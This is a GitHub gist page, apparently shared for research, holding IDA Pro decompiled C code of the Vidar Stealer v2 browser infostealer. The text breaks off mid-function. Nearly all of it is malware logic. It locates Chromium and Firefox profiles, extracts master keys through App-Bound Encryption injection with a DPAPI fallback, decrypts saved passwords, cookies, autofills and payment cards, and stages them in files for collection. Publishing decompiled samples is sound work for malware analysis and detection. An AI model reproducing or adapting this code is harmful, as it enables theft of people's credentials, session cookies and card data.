Skip to content

Instantly share code, notes, and snippets.

@shavitush

shavitush/vidar_chrome_abe.c

Created February 27, 2026 13:30
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save shavitush/1fdb39ea117b9ba805367608bc07a3b4 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save shavitush/1fdb39ea117b9ba805367608bc07a3b4 to your computer and use it in GitHub Desktop.
Download ZIP
Vidar Stealer v2's Chromium infostealer
Raw
vidar_chrome_abe.c
// decomp with IDA Pro 9.3
// positive sp value has been detected, the output may be wrong!
__int64 process_browsers()
{
__int64 v0; // rcx
__int64 v1; // rbx
_BYTE *v2; // rbp
unsigned int v3; // esi
int v4; // r12d
HANDLE FirstFileW; // rbp
char *v7; // rax
char *v8; // rcx
char *v9; // r9
_DWORD *v10; // rdi
__int64 v11; // rdx
unsigned __int64 n0xE; // rax
unsigned __int8 v13; // dl
unsigned __int8 v14; // r10
wchar_t *buf_1; // r8
__int64 v16; // r11
__int64 i; // rcx
unsigned __int8 v18; // dl
int i_1; // edx
const char *v20; // [rsp+68h] [rbp-13E10h]
_DWORD *v21; // [rsp+88h] [rbp-13DF0h]
unsigned int v22; // [rsp+A0h] [rbp-13DD8h] BYREF
unsigned int v23; // [rsp+A4h] [rbp-13DD4h] BYREF
void *v24; // [rsp+A8h] [rbp-13DD0h]
void *v25; // [rsp+B0h] [rbp-13DC8h] BYREF
void *v26; // [rsp+B8h] [rbp-13DC0h] BYREF
CHAR lpMultiByteStr[64]; // [rsp+C0h] [rbp-13DB8h] BYREF
const char *Buffer_4[34]; // [rsp+100h] [rbp-13D78h] BYREF
wchar_t Buffer[264]; // [rsp+210h] [rbp-13C68h] BYREF
WCHAR pszPath[264]; // [rsp+420h] [rbp-13A58h] BYREF
wchar_t Buffer_1[264]; // [rsp+630h] [rbp-13848h] BYREF
wchar_t Buffer_2[264]; // [rsp+840h] [rbp-13638h] BYREF
struct _WIN32_FIND_DATAW lpFindFileData_; // [rsp+A50h] [rbp-13428h] BYREF
wchar_t buf[328]; // [rsp+CA0h] [rbp-131D8h] BYREF
WCHAR Buffer_3[528]; // [rsp+F30h] [rbp-12F48h] BYREF
char v36[64]; // [rsp+1350h] [rbp-12B28h] BYREF
int v37; // [rsp+1390h] [rbp-12AE8h]
int v38; // [rsp+1394h] [rbp-12AE4h]
int v39; // [rsp+1398h] [rbp-12AE0h]
_BYTE v40[50688]; // [rsp+7820h] [rbp-C658h] BYREF
int v41; // [rsp+13E20h] [rbp-58h]
sub_140027320();
v1 = v0;
if ( !(unsigned int)sub_1400109E0() )
{
log("[!] AES-GCM init failed\n");
LABEL_28:
v3 = 0;
log("[!] Browser decrypt init failed\n");
return v3;
}
if ( !(unsigned int)sub_140013300() )
{
log("[!] SQLite init failed\n");
goto LABEL_28;
}
v2 = v40;
v3 = 0;
log("[*] === Client-side browser decryption ===\n");
((void (__fastcall *)(_BYTE *))sub_1400067A0)(v40);
log("[#] Found %d Chromium browsers\n", v41);
if ( v41 > 0 )
{
v4 = 0;
v3 = 0;
do
{
log("[*] Processing: %s\n", *(const char **)(*(_QWORD *)v2 + 8LL));
if ( (unsigned int)process_chrome_abe() )
{
++v3;
log("[+] %s: %d passwords, %d cookies, %d cards\n", v36, v37, v38, v39);
}
++v4;
v2 += 1056;
}
while ( v41 > v4 );
}
if ( !SHGetFolderPathW(nullptr, 26, nullptr, 0, pszPath) )
{
_snwprintf_s(Buffer, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\Mozilla\\Firefox\\Profiles", pszPath);
_snwprintf_s(Buffer_1, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\*", Buffer);
FirstFileW = FindFirstFileW(Buffer_1, &lpFindFileData_);
if ( FirstFileW != (HANDLE)-1LL )
{
do
{
if ( (lpFindFileData_.dwFileAttributes & FILE_WRITE_EA) != 0
&& wcscmp(lpFindFileData_.cFileName, L".")
&& wcscmp(lpFindFileData_.cFileName, asc_140079A26) )
{
_snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\%s", Buffer, lpFindFileData_.cFileName);
WideCharToMultiByte(0xFDE9u, 0, lpFindFileData_.cFileName, -1, lpMultiByteStr, 64, nullptr, nullptr);
Buffer_4[0] = nullptr;
LODWORD(v26) = 0;
_snwprintf_s(Buffer_3, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\compatibility.ini", Buffer_2);
if ( (unsigned int)sub_140007F50(Buffer_3) )
{
v20 = Buffer_4[0];
v7 = strstr(Buffer_4[0], "LastVersion=");
v8 = (char *)v20;
v9 = v7;
if ( v7 )
{
memset(buf, 0, 64);
v11 = -9218;
n0xE = (unsigned __int8)v7[12];
v13 = _bittest64(&v11, n0xE);
if ( (unsigned __int8)n0xE >= 0xEu )
v13 = 1;
v14 = v13 & ((_BYTE)n0xE != 95);
if ( v14 )
{
buf_1 = buf;
v16 = -9218;
for ( i = 1; i != 64; ++i )
{
*(_BYTE *)buf_1 = n0xE;
n0xE = (unsigned __int8)v9[i + 12];
v18 = _bittest64(&v16, n0xE);
if ( (unsigned __int8)n0xE >= 0xEu )
v18 = v14;
if ( (_BYTE)n0xE == 95 || !v18 )
{
i_1 = i;
v8 = (char *)v20;
goto LABEL_45;
}
buf_1 = (wchar_t *)((char *)buf_1 + 1);
}
v8 = (char *)v20;
i_1 = 63;
}
else
{
i_1 = 0;
}
LABEL_45:
*((_BYTE *)buf + i_1) = 0;
if ( LOBYTE(buf[0]) )
{
log("[#] Firefox version: %s\n", (const char *)buf);
v8 = (char *)Buffer_4[0];
}
}
free(v8);
}
v24 = nullptr;
_snwprintf_s(Buffer_3, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\cookies.sqlite", Buffer_2);
if ( (unsigned int)sub_140007F50(Buffer_3) )
{
log("[#] Firefox cookies.sqlite: %d bytes\n", 0);
v21 = (_DWORD *)((__int64 (__fastcall *)(void *, _QWORD))sub_14000B8B0)(v24, 0);
free(v24);
if ( v21 )
{
log("[#] Firefox parsed cookies: %d\n", v21[2]);
if ( (int)v21[2] > 0 )
{
v25 = nullptr;
v22 = 0;
if ( (unsigned int)((__int64 (__fastcall *)(_DWORD *, void **, unsigned int *))sub_140011900)(
v21,
&v25,
&v22) )
{
_snprintf_s(
(char *const)Buffer_4,
0x104u,
0xFFFFFFFFFFFFFFFFuLL,
"Browser/JsonFormat/Firefox/%s/cookies.json",
lpMultiByteStr);
((void (__fastcall *)(__int64, void *, _QWORD, const char **))sub_140001480)(v1, v25, v22, Buffer_4);
free(v25);
}
v26 = nullptr;
v23 = 0;
if ( (unsigned int)((__int64 (__fastcall *)(_DWORD *, void **, unsigned int *))sub_140012190)(
v21,
&v26,
&v23) )
{
((void (__fastcall *)(const char *, CHAR *, wchar_t *))sub_14000BC80)("Firefox", lpMultiByteStr, buf);
_snprintf_s(
(char *const)Buffer_4,
0x104u,
0xFFFFFFFFFFFFFFFFuLL,
"Browser/Cookies/%s.txt",
(const char *)buf);
((void (__fastcall *)(__int64, void *, _QWORD, const char **))sub_140001480)(v1, v26, v23, Buffer_4);
free(v26);
}
log("[#] Firefox/%s: %d cookies\n", lpMultiByteStr, v21[2]);
}
sub_14000B400(v21);
}
else
{
log("[#] Firefox parsed cookies: %d\n", -1);
}
}
else
{
log("[#] Firefox cookies.sqlite: file not readable\n");
}
v24 = nullptr;
_snwprintf_s(Buffer_3, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\formhistory.sqlite", Buffer_2);
if ( (unsigned int)sub_140007F50(Buffer_3) )
{
v10 = (_DWORD *)((__int64 (__fastcall *)(void *, _QWORD))sub_14000BB20)(v24, 0);
free(v24);
if ( v10 )
{
if ( (int)v10[2] > 0 )
{
v25 = nullptr;
v22 = 0;
if ( (unsigned int)((__int64 (__fastcall *)(_DWORD *, void **, unsigned int *))sub_140011F30)(
v10,
&v25,
&v22) )
{
_snprintf_s(
(char *const)Buffer_4,
0x104u,
0xFFFFFFFFFFFFFFFFuLL,
"Browser/JsonFormat/Firefox/%s/autofills.json",
lpMultiByteStr);
((void (__fastcall *)(__int64, void *, _QWORD, const char **))sub_140001480)(v1, v25, v22, Buffer_4);
free(v25);
}
v26 = nullptr;
v23 = 0;
if ( (unsigned int)((__int64 (__fastcall *)(_DWORD *, void **, unsigned int *))sub_140012880)(
v10,
&v26,
&v23) )
{
((void (__fastcall *)(const char *, CHAR *, wchar_t *))sub_14000BC80)("Firefox", lpMultiByteStr, buf);
_snprintf_s(
(char *const)Buffer_4,
0x104u,
0xFFFFFFFFFFFFFFFFuLL,
"Browser/Autofills/%s.txt",
(const char *)buf);
((void (__fastcall *)(__int64, void *, _QWORD, const char **))sub_140001480)(v1, v26, v23, Buffer_4);
free(v26);
}
log("[#] Firefox/%s: %d autofills\n", lpMultiByteStr, v10[2]);
}
sub_14000B4A0(v10);
}
}
memset(Buffer_3, 0, sizeof(Buffer_3));
memset(buf, 0, 0x288u);
wcsncpy_s(buf, 0x104u, Buffer_2, 0xFFFFFFFFFFFFFFFFuLL);
wcsncpy_s(&buf[260], 0x40u, lpFindFileData_.cFileName, 0xFFFFFFFFFFFFFFFFuLL);
if ( (unsigned int)((__int64 (__fastcall *)(WCHAR *, wchar_t *, __int64, const char *))sub_140008160)(
Buffer_3,
buf,
v1,
"Browser/JsonFormat/Firefox") )
log("[+] Firefox/%s: passwords decrypted via NSS\n", lpMultiByteStr);
}
}
while ( FindNextFileW(FirstFileW, &lpFindFileData_) );
FindClose(FirstFileW);
}
}
sub_1400134C0();
sub_140010A80();
log("[*] Browsers processed: %d\n", v3);
return v3;
}
// positive sp value has been detected, the output may be wrong!
__int64 process_chrome_abe()
{
const WCHAR *v0; // rcx
int v1; // r8d
int v2; // r12d
CHAR *v3; // rdx
__m128i *v4; // rbx
_DWORD *Destination_1; // r9
const WCHAR *v6; // r15
int v7; // esi
__m128i *buf_3; // rax
__m128i *buf_4; // rax
int (*__imp__snwprintf_s)(wchar_t *const, const size_t, const size_t, const wchar_t *const, ...); // r13
int v11; // r14d
wchar_t *Buffer_2; // rbp
int *v13; // r15
int v14; // esi
int *v15; // rbx
int v16; // eax
__int64 v18; // rax
void *v19; // rcx
__int64 v20; // rax
void *v21; // rcx
int *v22; // rax
int v23; // r12d
const char *v24; // r13
int n100; // ebp
const char *v26; // r9
int v27; // edi
unsigned int v28; // edi
_DWORD *v29; // rsi
void *v30; // r10
int *v31; // rax
int v32; // eax
int *v33; // r10
int v34; // eax
int *v35; // r10
int v36; // r14d
int v37; // ebx
__int64 v38; // rbp
int *v39; // r13
__int64 v40; // rsi
_QWORD *v41; // rcx
char *v42; // rsi
int v43; // eax
int v44; // edx
int v45; // esi
void *v46; // rax
int *v47; // rax
int v48; // eax
int *v49; // r10
int v50; // ebx
__int64 v51; // rbp
int *v52; // r13
__int64 v53; // rsi
_QWORD *v54; // rcx
char *v55; // rsi
int v56; // eax
int v57; // edx
int v58; // esi
void *v59; // rax
void *v60; // r10
__m128i v61; // xmm2
__int64 v62; // rax
__int64 v63; // rax
_DWORD *v64; // rbx
int v65; // eax
__int64 v66; // r10
int v67; // eax
int *v68; // r10
int v69; // ebx
__int64 v70; // r12
int *v71; // r13
__int64 v72; // rsi
_QWORD *v73; // rcx
char *v74; // rsi
__int64 v75; // rax
int v76; // edx
int v77; // esi
void *v78; // rax
int v79; // eax
int *v80; // r10
int v81; // eax
int *v82; // r10
int v83; // ebx
int *v84; // r12
__int64 v85; // rbp
__int64 v86; // rsi
int v87; // edx
void *dst; // rax
__int64 v89; // rax
int v90; // edx
int v91; // esi
void *v92; // rax
__int64 v93; // rax
int v94; // eax
__int64 v95; // r10
int v96; // eax
int *v97; // r10
int v98; // eax
int v99; // eax
int v100; // eax
__int64 v101; // r10
int *v102; // rcx
int v103; // eax
int *v104; // r10
int v105; // eax
int *v106; // r10
__int64 v107; // rax
int *v108; // [rsp+40h] [rbp-12378h]
unsigned int v109; // [rsp+60h] [rbp-12358h]
int *v110; // [rsp+88h] [rbp-12330h]
int *v111; // [rsp+90h] [rbp-12328h]
int *v112; // [rsp+98h] [rbp-12320h]
__m128i *buf_1; // [rsp+B0h] [rbp-12308h]
void *v114; // [rsp+C8h] [rbp-122F0h]
int *v115; // [rsp+C8h] [rbp-122F0h]
_DWORD *v116; // [rsp+C8h] [rbp-122F0h]
int *v117; // [rsp+C8h] [rbp-122F0h]
int *v118; // [rsp+C8h] [rbp-122F0h]
int v119; // [rsp+C8h] [rbp-122F0h]
int *v120; // [rsp+C8h] [rbp-122F0h]
int *v121; // [rsp+C8h] [rbp-122F0h]
int *v122; // [rsp+C8h] [rbp-122F0h]
__int64 v123; // [rsp+C8h] [rbp-122F0h]
__int64 v124; // [rsp+C8h] [rbp-122F0h]
int *v125; // [rsp+C8h] [rbp-122F0h]
int *v126; // [rsp+C8h] [rbp-122F0h]
int *v127; // [rsp+C8h] [rbp-122F0h]
__int64 v128; // [rsp+C8h] [rbp-122F0h]
int *v129; // [rsp+C8h] [rbp-122F0h]
void *v130; // [rsp+C8h] [rbp-122F0h]
int *v131; // [rsp+C8h] [rbp-122F0h]
int *v132; // [rsp+C8h] [rbp-122F0h]
int *v133; // [rsp+C8h] [rbp-122F0h]
__m128i *v134; // [rsp+D0h] [rbp-122E8h]
int v135; // [rsp+D0h] [rbp-122E8h]
int v136; // [rsp+D0h] [rbp-122E8h]
int v137; // [rsp+D0h] [rbp-122E8h]
wchar_t *Buffer_5; // [rsp+D8h] [rbp-122E0h]
__m128i *v139; // [rsp+D8h] [rbp-122E0h]
__m128i *v140; // [rsp+D8h] [rbp-122E0h]
int (*__imp__snwprintf_s_3)(wchar_t *const, const size_t, const size_t, const wchar_t *const, ...); // [rsp+E0h] [rbp-122D8h]
wchar_t *Buffer_4; // [rsp+E0h] [rbp-122D8h]
__m128i *v143; // [rsp+E0h] [rbp-122D8h]
int (*__imp__snwprintf_s_2)(wchar_t *const, const size_t, const size_t, const wchar_t *const, ...); // [rsp+E8h] [rbp-122D0h]
int (*__imp__snwprintf_s_1)(wchar_t *const, const size_t, const size_t, const wchar_t *const, ...); // [rsp+E8h] [rbp-122D0h]
wchar_t *Buffer_3; // [rsp+E8h] [rbp-122D0h]
unsigned int v147; // [rsp+100h] [rbp-122B8h] BYREF
unsigned int v148; // [rsp+104h] [rbp-122B4h] BYREF
void *v149; // [rsp+108h] [rbp-122B0h]
void *v150; // [rsp+110h] [rbp-122A8h] BYREF
void *v151; // [rsp+118h] [rbp-122A0h] BYREF
_OWORD buf[2]; // [rsp+120h] [rbp-12298h] BYREF
__m128i buf_2[2]; // [rsp+140h] [rbp-12278h] BYREF
void *lpMultiByteStr[8]; // [rsp+160h] [rbp-12258h] BYREF
char Buffer[128]; // [rsp+1A0h] [rbp-12218h] BYREF
void *v156[32]; // [rsp+220h] [rbp-12198h] BYREF
_BYTE Buffer_1[272]; // [rsp+320h] [rbp-12098h] BYREF
void *v158; // [rsp+430h] [rbp-11F88h] BYREF
int v159; // [rsp+438h] [rbp-11F80h]
__m128i v160; // [rsp+640h] [rbp-11D78h] BYREF
__m128i v161; // [rsp+650h] [rbp-11D68h] BYREF
int v162; // [rsp+660h] [rbp-11D58h]
int v163; // [rsp+664h] [rbp-11D54h]
DWORD lpBuffera[1026]; // [rsp+668h] [rbp-11D50h] BYREF
__m128i v165; // [rsp+1670h] [rbp-10D48h] BYREF
__m128i v166; // [rsp+1680h] [rbp-10D38h] BYREF
__int64 v167; // [rsp+1690h] [rbp-10D28h]
int v168; // [rsp+3EF0h] [rbp-E4C8h]
_DWORD v169[6428]; // [rsp+3F00h] [rbp-E4B8h] BYREF
__m128i Buffer_; // [rsp+A370h] [rbp-8048h] BYREF
__m128i v171; // [rsp+A380h] [rbp-8038h] BYREF
__int64 v172; // [rsp+A390h] [rbp-8028h]
__int64 v173; // [rsp+A398h] [rbp-8020h]
__int64 v174; // [rsp+A3A0h] [rbp-8018h]
__int64 v175; // [rsp+A3A8h] [rbp-8010h]
const WCHAR *v176; // [rsp+123C0h] [rbp+8h]
LPSTR v177; // [rsp+123C8h] [rbp+10h]
int v178; // [rsp+123D0h] [rbp+18h]
int v179; // [rsp+123D0h] [rbp+18h]
_DWORD *Destination; // [rsp+123D8h] [rbp+20h]
sub_140027320();
v176 = v0;
v2 = v1;
v177 = v3;
v4 = &v165;
Destination = Destination_1;
memset(buf, 0, sizeof(buf));
memset(buf_2, 0, sizeof(buf_2));
memset(v169, 0, 0x646Cu);
memset(Destination, 0, 0x64C4u);
strncpy((char *)Destination, *(const char **)(*(_QWORD *)v176 + 8LL), 0x3Fu);
_snprintf_s(Buffer, 0x80u, 0xFFFFFFFFFFFFFFFFuLL, "Browser/JsonFormat/%s", *(const char **)(*(_QWORD *)v176 + 8LL));
v165.m128i_i64[0] = 0;
v160.m128i_i32[0] = 0;
v6 = v176 + 4;
Buffer_ = 0u;
v171 = 0u;
v172 = 0;
v173 = 0;
v174 = 0;
v175 = 0;
if ( (unsigned int)((__int64 (__fastcall *)(const WCHAR *, __m128i *, __m128i *))sub_14000EDA0)(
v176 + 4,
&v165,
&v160) )
{
if ( (unsigned int)sub_14000FCF0((char *)v165.m128i_i64[0], &Buffer_, 0x40u) )
log("[#] %s version: %s\n", *(const char **)(*(_QWORD *)v176 + 8LL), Buffer_.m128i_i8);
free((void *)v165.m128i_i64[0]);
}
if ( !(unsigned int)abe_extract_master_key() )
{
log("[!] %s: Failed to extract master key\n", *(const char **)(*(_QWORD *)v176 + 8LL));
return 0;
}
v7 = v163;
if ( v163 )
{
log("[#] %s: ABE format detected\n", *(const char **)(*(_QWORD *)v176 + 8LL));
v167 = 0;
v165 = 0;
v166 = 0;
if ( (unsigned int)abe_inject_via_pipe(v176, lpBuffera, lpBuffera[1024], (__int64)&v165) )
{
if ( (_DWORD)v167 )
{
buf[0] = _mm_loadu_si128(&v165);
v107 = *(_QWORD *)v176;
buf[1] = _mm_loadu_si128(&v166);
log("[+] %s: ABE master key decrypted\n", *(const char **)(v107 + 8));
}
}
else
{
log("[#] %s: ABE injection failed (error %lu)\n", *(const char **)(*(_QWORD *)v176 + 8LL), HIDWORD(v167));
}
v7 = ((__int64 (__fastcall *)(const WCHAR *, __m128i *))sub_14000F960)(v6, &Buffer_);
if ( v7 )
{
v7 = v172;
if ( (_DWORD)v172 )
{
v7 = 1;
buf_2[0] = _mm_loadu_si128(&Buffer_);
v63 = *(_QWORD *)v176;
buf_2[1] = _mm_loadu_si128(&v171);
log("[#] %s: DPAPI fallback key available\n", *(const char **)(v63 + 8));
}
}
}
else if ( v162 )
{
v93 = *(_QWORD *)v176;
buf[0] = _mm_loadu_si128(&v160);
buf[1] = _mm_loadu_si128(&v161);
log("[+] %s: DPAPI master key decrypted\n", *(const char **)(v93 + 8));
}
buf_3 = (__m128i *)buf;
do
{
if ( buf_3->m128i_i8[0] )
{
_snprintf_s(Buffer_1, 260, -1, "%s/master_key.bin", Buffer);
((void (__fastcall *)(LPSTR, _OWORD *, __int64, _BYTE *))sub_140001480)(v177, buf, 32, Buffer_1);
if ( v7 )
goto LABEL_127;
goto LABEL_10;
}
buf_3 = (__m128i *)((char *)buf_3 + 1);
}
while ( buf_3 != buf_2 );
if ( !v7 )
{
log("[!] %s: No valid master key\n", *(const char **)(*(_QWORD *)v176 + 8LL));
return 0;
}
v61 = _mm_loadu_si128(&buf_2[1]);
v62 = *(_QWORD *)v176;
buf[0] = _mm_loadu_si128(buf_2);
buf[1] = v61;
log("[#] %s: Using DPAPI fallback as primary key\n", *(const char **)(v62 + 8));
_snprintf_s(Buffer_1, 260, -1, "%s/master_key.bin", Buffer);
((void (__fastcall *)(LPSTR, _OWORD *, __int64, _BYTE *))sub_140001480)(v177, buf, 32, Buffer_1);
LABEL_127:
_snprintf_s(Buffer_1, 260, -1, "%s/fallback_key.bin", Buffer);
((void (__fastcall *)(LPSTR, __m128i *, __int64, _BYTE *))sub_140001480)(v177, buf_2, 32, Buffer_1);
LABEL_10:
((void (__fastcall *)(const WCHAR *, __m128i *))sub_140007270)(v176, &v165);
log("[#] %s: %d profiles found\n", *(const char **)(*(_QWORD *)v176 + 8LL), v168);
if ( v168 <= 0 )
{
v108 = nullptr;
__imp__snwprintf_s = (void (*)(wchar_t *const, const size_t, const size_t, const wchar_t *const, ...))_snwprintf_s;
Buffer_2 = (wchar_t *)&v158;
v111 = nullptr;
v110 = nullptr;
v112 = nullptr;
v109 = 0;
goto LABEL_25;
}
buf_4 = nullptr;
if ( (v7 & 1) != 0 )
buf_4 = buf_2;
v111 = nullptr;
v110 = nullptr;
__imp__snwprintf_s = (void (*)(wchar_t *const, const size_t, const size_t, const wchar_t *const, ...))_snwprintf_s;
v11 = 0;
Buffer_2 = (wchar_t *)&v158;
buf_1 = buf_4;
v112 = nullptr;
v109 = 0;
v13 = nullptr;
do
{
WideCharToMultiByte(0xFDE9u, 0, &v4[32].m128i_u16[4], -1, (LPSTR)lpMultiByteStr, 64, nullptr, nullptr);
v149 = nullptr;
if ( (v2 & 1) == 0
|| (__imp__snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\Login Data", v4),
!(unsigned int)sub_140007F50(Buffer_2)) )
{
v14 = 0;
if ( (v2 & 2) == 0 )
goto LABEL_16;
goto LABEL_56;
}
v18 = sub_1400092A0((_DWORD)v149, 0, (unsigned int)buf, buf_1, (__int64)v169);
if ( !v18 )
{
log("[!] %s/%s: Login Data parse FAILED\n", Buffer, (const char *)lpMultiByteStr);
LABEL_173:
v19 = v149;
v14 = 0;
goto LABEL_55;
}
if ( *(int *)(v18 + 8) <= 0 )
{
v114 = (void *)v18;
if ( v169[16] <= 0 )
{
v14 = 0;
log("[#] %s/%s: Login Data empty (0 passwords)\n", Buffer, (const char *)lpMultiByteStr);
sub_14000B3A0(v114);
v19 = v149;
goto LABEL_55;
}
log("[!] %s/%s: %d passwords in DB, 0 decrypted - sending raw\n", Buffer, (const char *)lpMultiByteStr, v169[16]);
sub_14000B3A0(v114);
goto LABEL_173;
}
v150 = nullptr;
v147 = 0;
v124 = v18;
v65 = ((__int64 (__fastcall *)(__int64, void **, unsigned int *))sub_1400116E0)(v18, &v150, &v147);
v66 = v124;
v14 = v65;
if ( v65 )
{
_snprintf_s(Buffer_.m128i_i8, 520, -1, "%s/%s/passwords.json", Buffer, lpMultiByteStr);
v94 = ((__int64 (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(v177, v150, v147, &Buffer_);
v95 = v124;
v14 = v94;
if ( v94 == 1 )
{
log("[+] %s/%s: %d passwords decrypted\n", Buffer, (const char *)lpMultiByteStr, *(_DWORD *)(v124 + 8));
v95 = v124;
}
else
{
v14 = 0;
}
v128 = v95;
free(v150);
v66 = v128;
}
v125 = (int *)v66;
v151 = nullptr;
v148 = 0;
v67 = ((__int64 (__fastcall *)(__int64, void **, unsigned int *))sub_140012AF0)(v66, &v151, &v148);
v68 = v125;
if ( v67 )
{
((void (__fastcall *)(_QWORD, void **, void **))sub_14000BC80)(
*(_QWORD *)(*(_QWORD *)v176 + 8LL),
lpMultiByteStr,
v156);
_snprintf_s(Buffer_.m128i_i8, 520, -1, "Browser/Logins/%s.txt", v156);
((void (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(v177, v151, v148, &Buffer_);
free(v151);
v68 = v125;
}
if ( v112 )
{
if ( v68[2] > 0 )
{
v140 = v4;
v69 = 0;
v178 = v2;
v70 = 0;
__imp__snwprintf_s_1 = __imp__snwprintf_s;
v71 = v68;
v136 = v14;
do
{
while ( 1 )
{
v75 = v112[2];
v76 = v112[3];
if ( (int)v75 >= v76 )
{
v77 = 2 * v76;
v78 = realloc(*(void **)v112, 5120LL * v76);
if ( v78 )
{
*(_QWORD *)v112 = v78;
v112[3] = v77;
}
else
{
v77 = v112[3];
}
v75 = v112[2];
if ( (int)v75 >= v77 )
break;
}
v72 = *(_QWORD *)v71;
++v69;
v112[2] = v75 + 1;
v73 = (_QWORD *)(*(_QWORD *)v112 + 2560 * v75);
v74 = (char *)(v70 + v72);
v70 += 2560;
*v73 = *(_QWORD *)v74;
v73[319] = *((_QWORD *)v74 + 319);
qmemcpy(
(void *)((unsigned __int64)(v73 + 1) & 0xFFFFFFFFFFFFFFF8uLL),
(const void *)(v74 - ((char *)v73 - ((unsigned __int64)(v73 + 1) & 0xFFFFFFFFFFFFFFF8uLL))),
8LL * (((unsigned int)v73 - (((_DWORD)v73 + 8) & 0xFFFFFFF8) + 2560) >> 3));
if ( v69 >= v71[2] )
goto LABEL_151;
}
++v69;
v70 += 2560;
}
while ( v69 < v71[2] );
LABEL_151:
v68 = v71;
v14 = v136;
v4 = v140;
v2 = v178;
__imp__snwprintf_s = __imp__snwprintf_s_1;
}
v126 = v68;
free(*(void **)v68);
free(v126);
}
else
{
v112 = v68;
}
v19 = v149;
LABEL_55:
free(v19);
v149 = nullptr;
if ( (v2 & 2) == 0 )
goto LABEL_16;
LABEL_56:
__imp__snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\Network\\Cookies", v4);
if ( (unsigned int)sub_140007F50(Buffer_2) )
{
log("[#] Cookies read from Network/Cookies: %d bytes\n", 0);
goto LABEL_58;
}
__imp__snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, asc_1400794B2, v4);
if ( (unsigned int)sub_140007F50(Buffer_2) )
{
log("[#] Cookies read from Cookies: %d bytes\n", 0);
LABEL_58:
v20 = ((__int64 (__fastcall *)(void *, _QWORD, _OWORD *, __m128i *, _DWORD *))sub_1400099C0)(
v149,
0,
buf,
buf_1,
v169);
if ( v20 )
{
v115 = (int *)v20;
log("[#] Parsed cookies: %d\n", *(_DWORD *)(v20 + 8));
if ( v115[2] > 0 )
{
v150 = nullptr;
v147 = 0;
v79 = ((__int64 (__fastcall *)(int *, void **, unsigned int *))sub_140011900)(v115, &v150, &v147);
v80 = v115;
if ( v79 )
{
_snprintf_s(Buffer_.m128i_i8, 520, -1, "%s/%s/cookies.json", Buffer, lpMultiByteStr);
v96 = ((__int64 (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(v177, v150, v147, &Buffer_);
v97 = v115;
if ( v96 == 1 )
{
v14 = 1;
log("[#] %s/%s: %d cookies decrypted\n", Buffer, (const char *)lpMultiByteStr, v115[2]);
v97 = v115;
}
v129 = v97;
free(v150);
v80 = v129;
}
v127 = v80;
v151 = nullptr;
v148 = 0;
v81 = ((__int64 (__fastcall *)(int *, void **, unsigned int *))sub_140012190)(v80, &v151, &v148);
v82 = v127;
if ( v81 )
{
((void (__fastcall *)(_QWORD, void **, void **))sub_14000BC80)(
*(_QWORD *)(*(_QWORD *)v176 + 8LL),
lpMultiByteStr,
v156);
_snprintf_s(Buffer_.m128i_i8, 520, -1, "Browser/Cookies/%s.txt", v156);
((void (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(v177, v151, v148, &Buffer_);
free(v151);
v82 = v127;
}
if ( v110 )
{
if ( v82[2] > 0 )
{
v143 = v4;
v83 = 0;
v179 = v2;
v84 = v82;
Buffer_3 = Buffer_2;
v85 = 0;
v137 = v14;
do
{
v89 = v110[2];
v90 = v110[3];
if ( (int)v89 < v90
|| ((v91 = 2 * v90, (v92 = realloc(*(void **)v110, 9760LL * v90)) == nullptr)
? (v91 = v110[3])
: (*(_QWORD *)v110 = v92, v110[3] = v91),
v89 = v110[2],
(int)v89 < v91) )
{
v86 = *(_QWORD *)v84;
v87 = v89 + 1;
dst = (void *)(*(_QWORD *)v110 + 4880 * v89);
v110[2] = v87;
qmemcpy(dst, (const void *)(v85 + v86), 0x1310u);
}
++v83;
v85 += 4880;
}
while ( v83 < v84[2] );
v82 = v84;
v14 = v137;
v4 = v143;
Buffer_2 = Buffer_3;
v2 = v179;
}
v131 = v82;
free(*(void **)v82);
free(v131);
}
else
{
v110 = v82;
}
v21 = v149;
goto LABEL_62;
}
if ( v169[21] <= 0 )
{
log("[#] %s/%s: Cookies empty (0 cookies)\n", Buffer, (const char *)lpMultiByteStr);
sub_14000B400(v115);
v21 = v149;
LABEL_62:
free(v21);
v149 = nullptr;
goto LABEL_16;
}
log("[!] %s/%s: %d cookies in DB, 0 decrypted - sending raw\n", Buffer, (const char *)lpMultiByteStr, v169[21]);
sub_14000B400(v115);
}
else
{
log("[#] Parsed cookies: %d\n", -1);
log("[!] %s/%s: Cookies parse FAILED\n", Buffer, (const char *)lpMultiByteStr);
}
v21 = v149;
goto LABEL_62;
}
log("[#] Cookies file not readable\n");
LABEL_16:
__imp__snwprintf_s(Buffer_2, 0x104u, 0xFFFFFFFFFFFFFFFFuLL, L"%s\\Web Data", v4);
if ( (unsigned int)sub_140007F50(Buffer_2) )
{
if ( (v2 & 4) == 0 )
goto LABEL_18;
v47 = (int *)((__int64 (__fastcall *)(void *, _QWORD, _OWORD *))sub_14000A280)(v149, 0, buf);
if ( !v47 )
goto LABEL_18;
if ( v47[2] <= 0 )
{
sub_14000B440(v47);
goto LABEL_18;
}
v121 = v47;
v156[0] = nullptr;
LODWORD(v151) = 0;
v48 = ((__int64 (__fastcall *)(int *, void **, void **))sub_140011C80)(v47, v156, &v151);
v49 = v121;
if ( v48 )
{
_snprintf_s(Buffer_.m128i_i8, 520, -1, "%s/%s/payments.json", Buffer, lpMultiByteStr);
v103 = ((__int64 (__fastcall *)(LPSTR, void *, _QWORD, __m128i *))sub_140001480)(
v177,
v156[0],
(unsigned int)v151,
&Buffer_);
v104 = v121;
if ( v103 == 1 )
{
v14 = 1;
